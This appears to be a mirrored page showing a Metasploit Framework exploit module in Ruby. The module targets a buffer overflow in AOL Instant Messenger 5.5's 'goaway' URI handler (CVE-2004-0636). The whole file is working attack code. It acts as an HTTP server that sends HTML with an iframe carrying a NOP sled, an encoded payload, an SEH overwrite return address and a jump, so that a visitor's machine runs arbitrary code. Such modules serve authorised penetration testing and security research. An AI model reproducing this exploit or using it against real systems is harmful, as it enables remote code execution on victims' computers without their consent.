Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/browser/aim_goaway.rb
19812 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GreatRanking

8


9
  #

10
  # This module acts as an HTTP server and exploits an SEH overwrite

11
  #

12
  include Msf::Exploit::Seh

13
  include Msf::Exploit::Remote::HttpServer::HTML

14


15
  def initialize(info = {})

16
    super(

17
      update_info(

18
        info,

19
        'Name' => 'AOL Instant Messenger goaway Overflow',

20
        'Description' => %q{

21
          This module exploits a flaw in the handling of AOL Instant

22
          Messenger's 'goaway' URI handler.  An attacker can execute

23
          arbitrary code by supplying an overly sized buffer as the

24
          'message' parameter.  This issue is known to affect AOL Instant

25
          Messenger 5.5.

26
        },

27
        'License' => MSF_LICENSE,

28
        'Author' => [

29
          'skape',

30
          'thief <thief[at]hick.org>'

31
        ],

32
        'References' => [

33
          [ 'CVE', '2004-0636' ],

34
          [ 'OSVDB', '8398' ],

35
          [ 'BID', '10889'],

36
          [ 'URL', 'http://www.idefense.com/application/poi/display?id=121&type=vulnerabilities' ],

37
        ],

38
        'Payload' => {

39
          'Space' => 1014,

40
          'MaxNops' => 1014,

41
          'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40",

42
          'StackAdjustment' => -3500,

43
        },

44
        'Platform' => %w{win},

45
        'Targets' => [

46
          # Target 0: Automatic

47
          [

48
            'Windows NT/2000/XP/2003 Automatic',

49
            {

50
              'Platform' => 'win',

51
              'Rets' =>

52
                [

53
                  0x1108118f, # proto.com: pop/pop/ret

54
                ],

55
            },

56
          ],

57
        ],

58
        'DefaultTarget' => 0,

59
        'DisclosureDate' => '2004-08-09',

60
        'Notes' => {

61
          'Reliability' => UNKNOWN_RELIABILITY,

62
          'Stability' => UNKNOWN_STABILITY,

63
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

64
        }

65
      )

66
    )

67
  end

68


69
  def on_request_uri(cli, request)

70
    # Re-generate the payload

71
    return if ((p = regenerate_payload(cli)) == nil)

72


73
    # Build out the message

74
    msg =

75
      make_nops(1014 - p.encoded.length) +     # NOP sled before the payload

76
      p.encoded +                              # store the payload

77
      generate_seh_record(target['Rets'][0]) + # set up the SEH frame

78
      "\x90\xe9\x13\xfc\xff\xff"               # jmp -1000

79


80
    # Build the HTML content

81
    content = "<html><iframe src='aim:goaway?message=#{msg}'></html>"

82


83
    print_status("Sending #{self.name}")

84


85
    # Transmit the response to the client

86
    send_response_html(cli, content)

87


88
    # Handle the payload

89
    handler(cli)

90
  end

91
end

92


93